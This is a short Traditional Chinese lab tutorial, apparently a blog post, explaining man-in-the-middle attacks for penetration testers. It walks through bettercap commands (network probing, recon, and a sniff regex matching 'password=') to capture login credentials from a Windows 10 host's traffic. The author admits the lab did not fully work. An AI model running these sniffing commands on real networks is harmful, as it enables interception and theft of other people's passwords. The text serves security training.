攻擊者可以使用session hijacking來發起各種攻擊,例如中間人(MITM)攻擊。
在MITM攻擊中,攻擊者將自己置於授權客戶端和網絡服務器之間,以便在任一方向
傳輸的所有信息都通過它們。作為滲透測試員必須了解MITM攻擊的工作原理,
以便保護組織的敏感信息免受他們的侵害。
登入Parrot Security主機,輸入sudo su切換身份
輸入cd切換目録
輸入指令bettercap -h查看指令用法
輸入指令bettercap -iface eth0開始執行
輸入help
輸入指令net.probe on
輸入指令net.recon on
輸入指令set net.sniff.regexp ‘.*password=.+’
我們可以從bettercap去攔劫Windows 10主機的網路流量
從中截取到在Windows 10登入網站輸入的帳號/密碼(實做有問題先放示意圖)
iThome鐵人賽
看影片追技術